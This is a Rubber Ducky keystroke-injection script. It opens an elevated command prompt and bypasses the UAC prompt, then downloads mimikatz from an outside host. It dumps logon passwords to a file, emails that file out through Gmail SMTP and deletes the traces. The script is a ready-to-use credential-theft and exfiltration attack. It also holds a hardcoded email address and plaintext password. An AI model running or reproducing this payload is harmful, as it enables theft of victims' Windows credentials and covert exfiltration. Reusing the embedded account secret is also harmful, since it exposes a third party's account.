REM Author: Kristof Balajti-Toth
REM Date: 08/04/2017
REM -------------------------Small delay for the system-------------------------
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
CTRL-SHIFT ENTER
DELAY 1000
ALT y
ENTER
DELAY 300
REM -------------------------Download apropriate mimikatz for the architecture-------------------------
STRING powershell if ([System.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('www.contactlist.btksoftware.co/mimikatz32.exe','%TEMP%\pw.exe');  }else{ (new-object System.Net.WebClient).DownloadFile('www.contactlist.btksoftware.co/mimikatz64.exe','%TEMP%\pw.exe');}
ENTER
DELAY 5000
REM --------------------------Gather password and save them to c:\pwlog.txt-------------------------
STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
ENTER
DELAY 2000
STRING privilege::debug
ENTER
DELAY 1000
STRING sekurlsa::logonPasswords full
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 300
REM -------------------------Delete the mimikatz exe file-------------------------
STRING del %TEMP%\pw.exe
ENTER
DELAY 300
REM -------------------------Send credentials via gmail-------------------------
STRING powershell
ENTER
DELAY 300
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
REM -------------------------Enabling SSL-------------------------
STRING $SMTPInfo.EnableSsl = $true
ENTER
REM -------------------------Change your credentials-------------------------
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('tothkrisi@gmail.com', '28m56i6B');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
REM -------------------------Sender account-------------------------
STRING $ReportEmail.From = 'tothkrisi@gmail.com'
ENTER
REM -------------------------Receiver account-------------------------
STRING $ReportEmail.To.Add('btksoftware@gmail.com')
ENTER
REM -------------------------Email subject-------------------------
STRING $ReportEmail.Subject = 'Duck Report'
ENTER
REM -------------------------Email body-------------------------
STRING $ReportEmail.Body = 'Attached is your duck report.' 
ENTER
REM -------------------------Email attachment-------------------------
STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 1000
STRING exit
ENTER
REM -------------------------Delete the pwlog file-------------------------
STRING del c:\pwlog.txt
ENTER
DELAY 300
STRING exit
ENTER